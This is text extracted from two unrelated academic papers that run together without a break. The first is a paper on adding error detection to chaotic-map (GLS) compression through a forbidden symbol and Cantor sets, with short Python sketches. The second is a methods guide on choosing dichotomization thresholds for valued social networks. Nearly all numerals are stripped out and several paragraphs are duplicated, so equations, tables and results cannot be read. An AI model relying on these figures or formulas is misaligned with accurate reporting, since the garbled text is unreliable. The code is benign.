repeat request could be initiated. in gls-coding, the compressed file is the initial value of the symbolic sequence (the message m) on the appropriate gls. since gls is a chaotic map, it exhibits sensitive dependence on initial values, the hallmark of deterministic chaos (alligood et al., ). a small perturbation in the initial value will result in a symbolic sequence which is uncorrelated to the original symbolic sequence after a few iterations. this means that with a very high probability, even a slight amount of noise that is added to the initial value (compressed file) will result in a wrongly decoded message (symbolic sequence), which will be very different from the actual intended message. this is demonstrated in fig. . 
the first bit of the compressed file is flipped and gls-decoding is performed. the difference in the decoded message from the original message is shown in fig. (a). as it can be seen, the decoded message is very different from the original message. on the other hand, if the middle bit of the compressed file is flipped then the decoded image is accurate up to bits and the remaining bits are wrongly decoded (fig. (b)). the error affects only those bits which are subsequently decoded. error detection using cantor set in gls-coding, every real number on the interval [ , ) represents an initial value (compressed file). thus, any error in the initial value will result in another real number which is also an initial value, but for an entirely different symbolic sequence (message). it represents a valid compressed file which decodes to a different message. therefore in order to detect errors, we necessarily require that when noise gets added to the initial value while transmission on the communication channel, it should result in a value that is not a valid compressed file, so that at the decoder it can be flagged for error. this necessarily implies that not all real numbers in the interval [ , ) can be valid compressed files. we need to restrict the set of valid compressed files to a smaller subset of [ , ). this subset should be uncountable and dense since it should be able to decode all possible (infinite length) messages. at the same time, it should have negligible measure (zero measure) so that when noise is added, the probability that it falls outside the set is . cantor sets provide the perfect solution. . the cantor set the well known middle-third cantor set (alligood et al., ),(strogatz, ) is a good example to illustrate this idea. all real numbers between and which do not have in their ternary expansion / peerj comput. sci. reviewing pdf | (cs- : : : : :new dec ) manuscript to be reviewedcomputer science figure effect of noise on gls-coding. (a) the first bit of the compressed file is flipped. the decoded message is very different from the actual intended message. (b) the middle bit (bit no. ) of the com- pressed file is flipped. the first , bits are decoded without error and the remaining , bits show lots of decoding error. (p= . , n = , , compressed file size= , bits). in both cases, only part of the difference is shown. full-size doi: . /peerjcs. /fig- is uncorrelated to the original symbolic sequence after a few iterations. this means that with a very high probability, even a slight amount of noise that is added to the initial value (compressed file) will result in a wrongly decoded message (symbolic sequence), which will be very different from the actual intended message. this is demonstrated in fig. . the first bit of the compressed file is flipped and gls-decoding is performed. the difference in the decoded message from the original message is shown in fig. a. as it can be seen, the decoded message is very different from the original message. on the other hand, if the middle bit of the compressed file is flipped then the decoded image is accurate up to , bits and the remaining , bits are wrongly decoded (fig. b). the error affects only those bits which are subsequently decoded. error detection using cantor set in gls-coding, every real number on the interval [ , ) represents an initial value (compressed file). thus, any error in the initial value will result in another real number which is also an initial value, but for an entirely different symbolic sequence (message). 
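to see this sensitivity numerically, the following python sketch (an illustration, not the paper's code; the values of p, the initial value and the perturbation are arbitrary choices) forward-iterates the skew-tent map and reads off the decoded symbols for two nearby initial values:

def skew_tent(x, p):
    # gls (skew-tent) map t_p: [0, p) carries symbol '0', [p, 1) carries symbol '1'
    return x / p if x < p else (1 - x) / (1 - p)

def gls_decode(x0, p, n):
    # forward-iterate the map and record the symbolic sequence (gls-decoding)
    out, x = [], x0
    for _ in range(n):
        out.append('0' if x < p else '1')
        x = skew_tent(x, p)
    return ''.join(out)

p = 0.6
print(gls_decode(0.3141592, p, 30))
print(gls_decode(0.3141592 + 1e-6, p, 30))   # the tiny perturbation grows roughly exponentially, so the decoded symbols eventually differ

note that the perturbed value is still a perfectly legitimate point of [0, 1):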
it represents a valid compressed file which decodes to a different message. therefore in order to detect errors, we necessarily require that when noise gets added to the initial value while transmission on the communication channel, it should result in a value that is not a valid compressed file, so that at the decoder it can be flagged for error. this necessarily implies that not all real numbers in the interval [ , ) can be valid compressed files. we need to restrict the set of valid compressed files to a smaller subset of [ , ). this subset should be uncountable and dense since it should be able to decode all possible (infinite length) messages. at the same time, it should have negligible measure (zero measure) so that when noise is added, the probability that it falls outside the set is . cantor sets provide the perfect solution. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the term ‘cantor set’ is used here in a more general sense to refer to fractals that are obtained very much like the middle- third cantor set but with a different proportion (not necessarily rd) removed at every iteration. please see (strogatz, ). topological cantor sets are not self- similar. for further details, please see the references in loskot & beaulieu ( ). the cantor set the well known middle-third cantor set (alligood, sauer & yorke, ; strogatz, ) is a good example to illustrate this idea. all real numbers between and which do not have in their ternary expansion belong to this cantor set (call it c). we note down the following ‘‘paradoxical’’ aspects of cantor sets as observed in (strogatz, ): . cantor set c is ‘‘totally disconnected’’. this means that c contains only single points and no intervals. in this sense, all points in c are well separated from each other. . on the other hand, c contains no ‘‘isolated points’’. this means that every point in c has a neighbor arbitrarily close by. these two ‘‘paradoxical’’ aspects of cantor sets (not just for the middle third cantor set, but even for generalized cantor sets, as well as, topological cantor sets ) are actually very beneficial for error detection and correction. property implies that a small error will ensure that the resulting point is not in c while property ensures that we can always find the nearest point in c that can be decoded. self-similar cantor sets are fractal (their dimension is not an integer). we shall show that repetition codes, one of the oldest error detection/correction codes lie on a cantor set. repetition codes rn lie on a cantor set repetition codes are the oldest and most basic error detection and correction codes in coding theory. they are frequently used in applications where the cost and complexity of encoding and decoding are a primary concern. loskot & beaulieu ( ) provide a long list of practical applications of repetition codes. repetition codes are robust against impulsive noise and used in retransmission protocols, spread spectrum systems, multicarrier systems, infrared communications, transmit delay diversity, blast signaling, rate-matching in cellular systems, and synchronization of ultrawideband systems . thus, repetition codes are very useful in communications. they are described as follows. consider a message from a binary alphabet { , }. a repetition code rn (n> , odd integer) is a block code which assigns: → ... ︸ ︷︷ ︸ n → ... ︸ ︷︷ ︸ n . rn can correct up to n− bit errors since the minimum hamming distance of rn is n. 
since n is chosen to be an odd positive integer (> ), a majority count in every block of n symbols acts as a very simple but efficient decoding algorithm. the repetition code rn is a linear block code with a rate = n. we shall provide a new interpretation of rn, inspired by cantor set. start with the real line segment ( , ]. remove the middle ( − −n+ ) fraction of the set ( , ]. in the remaining two intervals, remove the same fraction and repeat this process in a recursive fashion (refer to fig. ). when this process is carried over an infinite number of times, the set that remains is a cantor set. furthermore, the binary representation of every element of the cantor set forms the codewords of rn. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. remove middle – - n+ n= f f f f figure . repetition codes rn lie on a cantor set: recursively remove the middle ( − −n+ ) fraction. as an example, r is depicted above. the box-counting dimension of the cantor set is d = n . this is equal to the rate of the code. establishes a very important connection between the properties of the cantor set and the property of the code. incorporating error detection into gls-coding using a can- tor set having established that one of the oldest error detection/correction methods, namely repetition codes, belong to a cantor set, we shall extend this idea of using cantor set for error detection to gls-coding. first, we establish a connection between repetition codes and gls-coding. . repetition codes re-visited it is a common view to look at repetition codes as block codes. in this section, we view them as gls-coding with a forbidden symbol. we could re-interpret fig. in a different way. let the middle − −n+ interval be reserved for the forbidden symbol ‘f ’ (this symbol never occurs in the message to be encoded) and the intervals [ , −n) and [ − −n, ) correspond to the symbols ‘ ’ and ‘ ’ respectively. we treat all binary messages as symbolic sequences on this modified map and perform gls-coding, i.e. find the initial value of a given message m. for gls-coding, we are treating the alphabet { ,f, } as taking the probabilities { −n, − −n+ , −n} respectively. the resulting initial value of gls-coding is the codeword for the message and it turns out that it is the same as rn(m). thus we have interpreted rn(m) as a joint source channel code where the source has three alphabets and we are encoding messages that contain only and . by reserving a forbidden symbol ‘f ’ which is not used in encoding, all pre-images of the interval corresponding to ‘f ’ have to be removed. thus, we have effectively created the same cantor set that was referred to in the previous section. for error detection, one has to start with the initial value and iterate forwards on the modified map and record the symbolic sequence. if the symbolic sequence while decoding contains the symbol ‘f ’, then it invariably means that the initial value is not a part of the cantor set and hence not a valid codeword of rn, thereby detecting that an error has occurred. thus checking whether the initial value received belongs to the cantor set or not is used for error detection at the decoder. . gls-coding with a forbidden symbol we have presented two new ways of looking at repetition codes - ) the codewords of rn lie on a cantor set and ) coding a message is the same as performing gls-coding with a forbidden symbol reserved on the interval [ , ). 
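the block-code view summarized above is easy to state in code; the following python sketch (illustrative only, not from the paper) encodes by repetition and decodes each block of n symbols by a majority count:

def rn_encode(msg, n):
    # repetition code r_n: '0' -> '0'*n, '1' -> '1'*n (n odd)
    return ''.join(bit * n for bit in msg)

def rn_decode(codeword, n):
    # majority count in every block of n symbols; corrects up to (n-1)//2 flips per block
    blocks = [codeword[i:i + n] for i in range(0, len(codeword), n)]
    return ''.join('1' if b.count('1') > n // 2 else '0' for b in blocks)

c = rn_encode('0110', 3)                              # -> '000111111000'
c = c[:4] + ('0' if c[4] == '1' else '1') + c[5:]     # flip a single bit
print(rn_decode(c, 3))                                # -> '0110', the error is corrected by the majority vote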
in order to see that the codewords of r_n lie on a cantor set, consider n = . the figure above shows how r is recursively constructed for this case. if the construction is terminated at iteration k, then there remains a set of intervals whose binary expansions (of length nk) contain the codewords for all possible binary messages of length k. for example, at k = for r , we can see that there are four intervals which contain real numbers with binary expansions starting from , , and . these are the codewords for the messages , , and respectively. in the limit of this process, the set results in a cantor set of measure zero which contains codewords for all binary messages which are infinitely long.

box-counting dimension of r_n
we noted that repetition codes r_n lie on a cantor set. it is very easy to compute the box-counting dimension of this cantor set:

d = lim_{δ→0} log b(δ) / log(1/δ),

where b(δ) is the number of boxes of size δ needed to cover the set. for r_n, the box-counting dimension is d = 1/n, which is equal to the rate of the code. this establishes a very important connection between the properties of the cantor set and the property of the code.
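this dimension can also be checked numerically. in the sketch below (an illustration under the construction described above, not code from the paper), after k construction steps there remain 2^k intervals, each of width 2^(-nk), and the box-counting estimate reduces to 1/n:

import math

def box_counting_dimension_rn(n, k=20):
    # after k steps of the r_n construction: 2**k surviving intervals of width 2**(-n*k)
    num_boxes = 2 ** k
    delta = 2.0 ** (-n * k)
    return math.log(num_boxes) / math.log(1.0 / delta)

print(box_counting_dimension_rn(3))   # -> 0.333..., i.e. 1/n, the rate of the repetition code with n = 3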
if the symbolic sequence while decoding contains the symbol ‘f’, then it invariably means that the initial value is not a part of the cantor set and hence not a valid codeword of rn, thereby detecting that an error has occurred. thus checking whether the initial value received belongs to the cantor set or not is used for error detection at the decoder. gls-coding with a forbidden symbol we have presented two new ways of looking at repetition codes—( ) the codewords of rn lie on a cantor set and ( ) coding a message is the same as performing gls-coding with a forbidden symbol reserved on the interval [ , ). the two are essentially the same because, by reserving a forbidden symbol f, we have effectively created a cantor set on which all the codewords lie. but the fact that we can view rn as gls-codes enables us to see them as joint source channel codes for the source with alphabets { ,f, } and with probability distribution { −n, − −n+ , −n} respectively. the natural question to ask is whether we can use the same method for a different probability distribution of and . the answer is positive. instead of reserving a forbidden symbol f of length − −n+ , we could chose any arbitrary value � > for the forbidden symbol. the value of � determines the amount of redundancy that is going to be available for error detection/correction. it controls the fractal dimension of the cantor set and hence the rate of the code. as � increases, error detection/correction property improves at the cost of a slight reduction in compression ratio (note that the compression is still lossless, but no longer shannon optimal). the probability of the symbol ‘ ’ is p, but only ( −�)p is allocated on the interval [ , ). similarly, for the symbol ‘ ’: ( −�)( −p) is allocated. this single parameter � can be tuned for trade-off between error control and lossless compression ratio. we shall show that a very small value of � is sufficient for detecting errors without significantly increasing the compressed file size. for encoding, as before, the binary message is treated as a symbolic sequence on the modified gls with the forbidden symbol ‘ f’ and the initial value is determined. the nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. initial value which is now on the cantor set is the compressed file which is stored and/or transmitted to the decoder. error detection with gls-decoding the decoder is the same as before except that we now have error detection capability. if the forbidden symbol ‘ f’ is encountered during gls decoding (this can happen only if noise corrupts the initial value/compressed file and throws it outside the cantor set), then it is declared that an error has been detected. the decoder can then request the encoder to re-transmit the compressed file as is done in several protocols (chou & ramchandran, ). however, this scheme does not correct the error. it is quite possible that the noise is such that the initial value gets modified into another value which also happens to fall inside the cantor set, in which case the decoder will not be able to detect the error (and thus we end up wrongly decoding the message). but, the probability of this occurring is very small (it is zero in the case of messages having infinite length since the measure of the cantor set is zero). for finite length messages, the probability of such an event is given by the measure of the set of codewords (which is non-zero). 
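a floating-point toy version of this scheme is sketched below; it is not the paper's implementation (and works only for short messages because of double-precision limits). the interval [0, 1) is split into [0, (1 - eps)p) for '0', a forbidden slice of width eps, and the remainder for '1'; decoding flags an error whenever the received value falls into the forbidden slice or leaves [0, 1):

import math

def intervals(p, eps):
    # '0' gets (1-eps)*p, the forbidden symbol 'f' gets eps, '1' gets (1-eps)*(1-p)
    q0 = (1 - eps) * p
    return {'0': (0.0, q0), 'f': (q0, q0 + eps), '1': (q0 + eps, 1.0)}

def encode(msg, p, eps):
    low, high, iv = 0.0, 1.0, intervals(p, eps)
    for s in msg:
        a, b = iv[s]
        low, high = low + (high - low) * a, low + (high - low) * b
    return (low + high) / 2                      # mid-point of the final interval is the compressed value

def decode(x, length, p, eps):
    iv, out = intervals(p, eps), []
    for _ in range(length):
        for s, (a, b) in iv.items():
            if a <= x < b:
                if s == 'f':
                    return ''.join(out), True    # forbidden region reached: error detected
                out.append(s)
                x = (x - a) / (b - a)            # forward iteration of the map
                break
        else:
            return ''.join(out), True            # x left [0, 1): also flagged as an error
    return ''.join(out), False

def redundancy_per_symbol(eps):
    # overhead of the forbidden slice: -log2(1 - eps) extra bits per encoded symbol
    return -math.log2(1 - eps)

msg = '0010010111'
x = encode(msg, 0.5, 0.05)
print(decode(x, len(msg), 0.5, 0.05))            # -> ('0010010111', False)
print(decode(x + 1e-3, len(msg), 0.5, 0.05))     # a perturbed value is likely (though not certain) to be flagged
print(redundancy_per_symbol(0.05))               # ~0.074 bits/symbol for this illustrative eps

as in the text, a larger eps improves detection at the cost of extra redundancy; the overhead of -log2(1 - eps) bits per symbol, and the corresponding code rate, is derived in the simulation results that follow.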
in the following section, we perform rigorous experimental tests of the proposed approach. simulation results three different values of � (� = . , � = . , � = . ) for the length of the interval corresponding to the forbidden symbol ‘ f’ were used. the amount of redundancy that needs to be added is easy to determine. by introducing the forbidden symbol of length �, the valid symbols occupy a sub-interval of length −�. thus, each time a symbol with probability p is encoded, −log (( −�)p) bits will be spent, whereas only −log (p) bits would have been spent without the forbidden symbol. thus, the amount of redundancy is r(�)=−log (( −�)p)+log (p)=−log ( −�) bits/symbol. for n symbols, this would be n ·r(�) bits rounded to the nearest highest integer. thus the rate of the code will be: rate = +r(�) = −log ( −�) . ( ) as expected, this is equal to the box-counting dimension of the cantor set. thus, by plugging in �= − −n+ in eq. ( ), we obtain the rate of the repetition codes as n. we introduced a single bit error (one bit is flipped in the entire compressed file) towards the end of the compressed file for binary i.i.d. sources (p= . , . ). note that, it is much more difficult to detect errors if they happen towards the end of the compressed file than if it occurred in the beginning of the file. this is because, any error can only affect decoding for subsequent bits and if the error was towards the end-of-file (eof), not many bits are available to catch it. remember that the cantor set (having zero measure) is obtained only after an infinite number of iterations. since we are terminating after a finite number of iterations, we don’t strictly get a cantor set. in other words, the set that remains when we terminate after a finite number of iterations is an approximation to the cantor set and it contains points which would have been discarded if we had continued iterating. the single-bit errors closer to the eof thus decode to points which are not discarded because of this approximation (as we run out of iterations). these errors survive and go undetected. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. it should be noted that errors introduced in the beginning of the compressed bitstream were always detected. table gls-coding with forbidden symbol: redundancy (n = , , cfs, compressed file size). cfs �= (bits) � = . � = . � = . p n ·r(� ) (bits) cfs (bits) n ·r(� ) (bits) cfs n ·r(� ) (bits) cfs (bits) . , , , , . , , , , table gls-decoding with forbidden symbol: error detection (p= . ). eof stands for ‘end-of-file’. location of single bit-error introduced number of error events � = . � = . � = . detected undetected detected undetected detected undetected eof to eof− eof− to eof− eof− to eof− eof− to eof− total table gls-decoding with forbidden symbol: error detection (p= . ). eof stands for ‘end-of-file’. location of single bit-error introduced number of error events � = . � = . � = . detected undetected detected undetected detected undetected eof to eof− eof− to eof− eof− to eof− eof− to eof− total in our simulations, the location of the single bit error was varied from the last bit to the th bit from end-of-file. thus, the total number of single-bit error events introduced in the compressed bitstream is for each setting of �. this way, we can test the proposed method under the worst scenario . table shows the amount of redundancy owing to the allocation of the forbidden symbol. tables and shows the performance of the method for p= . and p= . 
. as expected, higher values of � are able to detect more errors, but at the cost of increased compressed file size. table shows the efficiency of the method. up to % of single bit errors introduced at the tail of the compressed file are detected by a modest increase in the redundancy (up to . %). it should be noted that errors introduced in the beginning of the compressed file can be very easily detected by the proposed method. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table gls-coding with forbidden symbol: efficiency. p % of errors detected � = . � = . � = . . . % . % . % . . % . % . % arithmetic coding with a forbidden symbol: prior work the idea of using a forbidden symbol into arithmetic coding was first introduced by boyd et al. ( ). it was subsequently studied by chou & ramchandran ( ), grangetto & cosman ( ), anand, ramchandran & kozintsev ( ), pettijohn, hoffman & sayood ( ) and bi, hoffman & sayood ( ). however, the approach that is taken in this paper is unique and entirely motivated by a non-linear dynamical systems approach, through the wonderful properties of cantor sets. we are thus able to justify why the method actually works. to the best of our knowledge, none of the earlier researchers have made this close connection between error detection/correction for repetition codes or arithmetic coding and cantor sets. this work paves the way for future research on error correction using fractals/cantor sets and potentially a host of new efficient techniques using cantor sets could be designed. conclusions and future work in this work, we have provided a novel application of cantor sets for incorporating error detection into a lossless data compression algorithm (gls-coding). cantor sets have paradoxical properties that enable error detection and correction. repetition codes are an example of codewords on a self-similar cantor set which can detect and correct errors. by reserving a forbidden symbol on the interval [ , ), we can ensure that the codewords for gls-coding lie on a cantor set and thereby detect errors while simultaneously gls- decoding (thus preserving progressive transmission property), and without significantly increasing the compressed file size. this approach can be applied to any mode of gls and generalizable to larger alphabets. however, we do not know whether other efficient error control codes can be similarly designed using such cantor sets (or other fractals in higher dimensions) and whether we can exploit the structure of the cantor set to perform efficient error correction. these are important research directions worth exploring in the future. acknowledgements the author expresses sincere thanks to prabhakar g. vaidya for introducing him to the fascinating field of non-linear dynamics/chaos, cantor sets and fractals, and to william a. pearlman for introducing him to the equally exciting field of data compression. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by tata trusts. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: tata trusts. competing interests there are no competing interests. 
author contributions • nithin nagaraj conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: matlab code is available in a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alligood kt, sauer td, yorke ja. . chaos. new york: springer. anand r, ramchandran k, kozintsev iv. . continuous error detection (ced) for reliable communication. ieee transactions on communications ( ): – doi . / . . bi d, hoffman mw, sayood k. . state machine interpretation of arithmetic codes for joint source and channel coding. in: data compression conference, . dcc . proceedings. ieee, – doi . /dcc. . . bose r. . information theory, coding and cryptography. second edition. new delhi: tata mcgraw-hill publishing company limited. boyd c, cleary jg, irvine sa, rinsma-melchert i, witten ih. . integrating error detection into arithmetic coding. ieee transactions on communications ( ): – doi . / . . chou j, ramchandran k. . arithmetic coding-based continuous error detection for efficient arq-based image transmission. ieee journal on selected areas in communications ( ): – doi . / . . nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /dcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. cover tm, thomas ja. . elements of information theory. hoboken: john wiley & sons. grangetto m, cosman p. . map decoding of arithmetic codes with a forbidden symbol. in: proc. of acivs , ghent, belgium, vol. . hamming rw. . error detecting and error correcting codes. bell system technical journal ( ): – doi . /j. - . .tb .x. lin s, costello dj. . error control coding: fundamentals and applications. englewood cliffs: prentice-hall, inc. loskot p, beaulieu nc. . a family of rate / modified binary block repetition codes. in: signals, systems and computers, . conference record of the thirty-eighth asilomar conference on, vol. . piscataway: ieee, – . nagaraj n, vaidya pg, bhat kg. . arithmetic coding as a non-linear dynam- ical system. communications in nonlinear science and numerical simulation ( ): – doi . /j.cnsns. . . . pettijohn bd, hoffman mw, sayood k. . joint source/channel coding us- ing arithmetic codes. ieee transactions on communications ( ): – doi . / . . rissanen j, langdon gg. . arithmetic coding. ibm journal of research and develop- ment ( ): – doi . /rd. . . said a, pearlman wa. . a new, fast, and efficient image codec based on set par- titioning in hierarchical trees. ieee transactions on circuits and systems for video technology ( ): – doi . / . . sayood k. . introduction to data compression. burlington: morgan kaufmann. shannon c. . a mathematical theory of communication. bell system technical jour- nal : – & - , july & october doi . /j. - . .tb .x. shannon ce. . coding theorems for a discrete source with a fidelity criterion. ire national convention record : – . strogatz sh. . 
nonlinear dynamics and chaos: with applications to physics, biology, chemistry, and engineering. boca raton: crc press. taubman d, marcellin m. . jpeg image compression fundamentals, standards and practice: image compression fundamentals, standards and practice. boston: kluwer academic publishers. wallace gk. . the jpeg still picture compression standard. ieee transactions on consumer electronics ( ):xviii–xxxiv. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.cnsns. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /rd. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) connections issue | vol. article | doi: . /connections- - techniques: dichotomizing a network abstract this techniques guide provides a brief answer to the question: how to choose a dichotomization threshold? we propose a two step ap- proach to selecting a dichotomization threshold. we illustrate the approaches using two datasets and provide instructions on how to perform these approaches in r and ucinet. keywords techniques, dichotomization. there are many reasons to dichotomize valued network data. it might be for methodological rea- sons, for example, in order to use a graph-theoret- ic concept such as a clique or an n-clan, or to use methods such as ergms or saoms, which large- ly assume binary data . there is also the matter of visualizing networks, where fewer ties often yield a considerably more readable picture. it could also be for theoretical reasons. for example, in order to dis- tinguish between positive and negative ties, since tie strength or valence is often captured using a single scale, which then needs to be dichotomized in order to match the theory. finally, we might be engaging in a certain kind of data smoothing: we have collect- ed data at fine levels of differences in the strength of tie, but are not confident that small differences are meaningful. we have greater confidence in a few big buckets such as strong and weak than in gradu- ations of strength. whatever the reason, if we are going dichot- omize, the question is at what level should we di- chotomize? in some cases, the situation is guided by theoretical meaningfulness and the research de- sign. for example, suppose respondents are asked to rate others on a scale of = do not know them, = acquaintance, = friend, and = family. we see there is a loose gradation from “does not know” to “knows well”; however, categories and do not possess so much degrees of closeness as different kinds of social relations. the choice of which to use is determined by the research question. a similar ex- ample is provided by questions that ask for a range of effects from negative to positive. if respondents are asked to rate others on a scale of = dislike a lot, = dislike somewhat, = neither like nor dislike, = like somewhat, and = like a lot, for many analy- ses, it will make sense to choose a cut off of > or > for positive ties and < or < for negative ties. note that in both of the last examples, we are still confronted with a choice of two values to choose from. in addition, if the scale points are more ambig- uous than the ones above, or if the data are counts or rankings, then there is likely no a priori way of de- ciding where to dichotomize. here, we propose a two-step approach to di- chotomizing. 
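whatever threshold is eventually chosen, the mechanical operation is the same. below is a minimal numpy sketch (the valued matrix is made up) of dichotomizing a network at a single cutoff and of sweeping every possible cutoff, as in the first step described next:

```python
import numpy as np

def dichotomize(valued: np.ndarray, cutoff: float, strict: bool = False) -> np.ndarray:
    """Return a binary adjacency matrix: 1 where the valued tie is >= cutoff
    (or > cutoff if strict=True), else 0."""
    return (valued > cutoff).astype(int) if strict else (valued >= cutoff).astype(int)

# a small made-up valued network (e.g., counts of co-attendance)
W = np.array([[0, 5, 2, 0],
              [5, 0, 3, 1],
              [2, 3, 0, 4],
              [0, 1, 4, 0]])

# one binary network per possible threshold
n = W.shape[0]
for c in range(1, int(W.max()) + 1):
    B = dichotomize(W, c)                      # ties with value >= c
    density = B.sum() / (n * (n - 1))          # fraction of possible (ordered) ties
    print(f">= {c}: {B.sum()} ties, density {density:.2f}")
```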
step is to simply dichotomize at every level (or a collection of k bins) and examine the net- work produced at each level. step is to use simple analytics in order to obtain an informed rationale for a specific dichotomization threshold that makes sense for a given data set. step for step , input your valued network into your favorite network data management software and dichotomize at every level of the scale (see insert for information about how to do this in r and in ucinet). we rec- ommend always spending some time visualizing the stephen p. borgatti * and eric quintane university of kentucky, gatton college of business & econom- ics lexington, ky. school of management, the university of los andes, bogota, colombia. *e-mail: sborgatti@uky.edu. there are, of course, many methods that do not require di- chotomization. for example, we do not need to dichotomize in order to measure eigenvector centrality, nor to apply the relational event model (butts, ). techniques: dichotomizing a network table . one mode dgg women by women network projection. ev la th br ch fr el pe ru ve my ka sy no he do ol fl evelyn laura theresa brenda charlotte frances eleanor pearl ruth verne myrna katherine sylvia nora helen dorothy olivia flora figure : dgg women by women dataset dichotomized above . connections networks, which can be very informative regarding the emergence of clusters at certain levels of dichot- omization. for example, consider davis et al.’s ( ) women-by-events data (often referred to as the davis data set or the dgg data). we construct a -mode women-by-women network by multiplying the original by its transpose. the result is shown in table . if we dichotomize at > and visualize, we get figure . if we dichotomize at > , we get figure . and if we dichotomize at > , we get figure . thus, the successive dichotomizations reveal a -group structure, which is illuminating . in oth- er networks, successive dichotomization confirms a core/periphery structure. for example, the bkfrat data set (bernard et al., ) gives the number of times each pair of actors was seen interacting by an observer. the values range from to . if we dichot- omize at > , we get figure . if we dichotomize at > , we get figure . dichotomizing at > , we get figure . dichotomizing at > , we get figure . and so on. core-periphery structures have a kind of self-similarity property where the main component always looks the same regardless of what level of dichotomization produced it. step (three approaches) now, successive dichotomizations are informative, but our original question was about choosing a sin- gle dichotomization that would be used in all further analyses, which is where step becomes important. for step , we present three potential approaches. the first will horrify some people. this approach is to choose the level of dichotomization that maximizes your results. for example, suppose you are predicting managers’ performance as a function of between- ness centrality. for each possible level of dichoto- mization, you measure betweenness centrality and regress performance on betweenness, along with any control variables. the level of dichotomization that yields the highest r is the one you choose. as we said, some people (scientists, statisticians, and people of good character) will be horrified . there is definitely a danger of overfitting. the predictions work really well for this one data set, but perhaps not figure : dgg women by women dataset dichotomized above . however, this should not be taken as definitive. 
various normalizations of the data, as well as bipartite representa- tions, tend to show a third smaller subgroup. see freeman ( ) for a related discussion. on the other hand, these same people are happy to use regression to find the optimal coefficients to show a rela- tionship between their explanatory variable and a depend- ent. perhaps, we should ask them to choose the coeffi- cients a priori on the basis of strong theory. of course, if you have these other datasets on hand, then you could pick the level of dichotomization that yields the highest average r across all datasets. the same applies if you have multiple dvs and ivs – you pick that level of dichotomization that gives the best results across all data- sets, dvs, and ivs. techniques: dichotomizing a network for others, . the other issue is that the particular di- chotomization value that scores highest may be an odd value that you cannot explain. for example, sup- pose we carry out this procedure and get the results shown in table . clearly, we would choose , but how to make sense of these results? they rise and fall with no rhyme or reason. in this case, we would strongly advise against taking this approach. on the other hand, if the results were something like those presented in table , we would be comforted by the underlying regular- ity and feel good about choosing , even though we might be hard-pressed to explain why medium density worked best. a slightly less controversial version of this ap- proach might be to choose the dichotomized version of your network that maximizes the repli- cation of results from past studies. for example, we know from past studies that actors with higher levels of self-monitoring are more likely to receive figure : bks fraternity dataset dichotomized above . figure : dgg women by women dataset dichotomized above . connections more friendship nominations. we could choose the dichotomization threshold that maximizes the relationship between self-monitoring and new friendship nominations, even if the test of our hy- pothesis has to do with betweenness centrality and performance. that was the first approach. the second approach is less controversial. dichotomization, by its very nature, is a distortion of the data . where once you had nuance, you now have just ‘has tie’ and ‘not tie.’ this does violence to your data. the question is, how figure : bks fraternity dataset dichotomized above . clearly, in some cases, distorting the data is what we are looking for, for example, when distinguishing between neg- ative and positive ties. in this case, we should not expect the dichotomized data to preserve the properties of the original dataset and we should either use a theoretically or literature driven approach or revert to approach . figure : bks fraternity dataset dichotomized above . techniques: dichotomizing a network much? suppose, as in an analysis of variance, you predicted your valued data from your dichotomized data. some cutoff values are going to yield better pre- dictions than others. here is an example using the da- vis, gardner, and gardner women-by-women data. in the table below, the first column is the dichotomization value. for example, value means that the data were dichotomized at ≥ . dichotomizing at ≥ results in a network with ties, which corresponds to a density of . . the interesting part is the correlation column, which achieves its maximum at ≥ (correlation . ). the correlation refers to the correlation between the original valued matrix and the dichotomized matrix. 
a correlation of . is extremely high. yes, the data table . r-square of models predicting performance using betweenness centrality at different levels of dichotomization. dichot. level r . . . . . . . . . table . r-square of models predicting performance using betweenness centrality at different levels of dichotomization. dichot. level r . . . . . . . . . figure : bks fraternity dataset dichotomized above . connections are distorted by dichotomizing, but the dichotomized matrix still retains a very high resemblance to the origi- nal data. we have chosen a level of dichotomization that does the least violence to the original data (table ). interestingly, ≥ is the level just below the one at which the network splits into two large components (along with four isolates). at ≥ , the network looks like this, as shown in figure the third approach is theory based, and can be harder to implement. there are certain cases where we can use the emergent properties of the dichot- omized networks themselves in order to identify the correct dichotomization threshold, just like when we noticed the appearance of clusters while visually in- specting different dichotomization thresholds in the dgg data. as an example, let us consider an ap- proach proposed by freeman ( ) to distinguish between weak and strong ties. in his piece on the strength of weak ties, granovetter ( ) argues that an important characteristic of strong ties is that if a is strongly tied to b, and b is strongly tied to c, then a is likely to be at least weakly tied to c. in his analysis of the dgg data, freeman ( ) refers to granovetter’s transitivity rule as g-transitivity. a data set is perfectly g-transitive if there are no violations of g-transitivity. given a valued data set (and selecting a value such as zero as an indicator of no ties), freeman’s proposal is to dichotomize the data set at every possible cutoff and calculate the number of violations of g-transitivity at each level. the lowest cutoff with an acceptable number of violations (such as zero) identifies the strong tie. for example, applied to the davis women data, we get table . 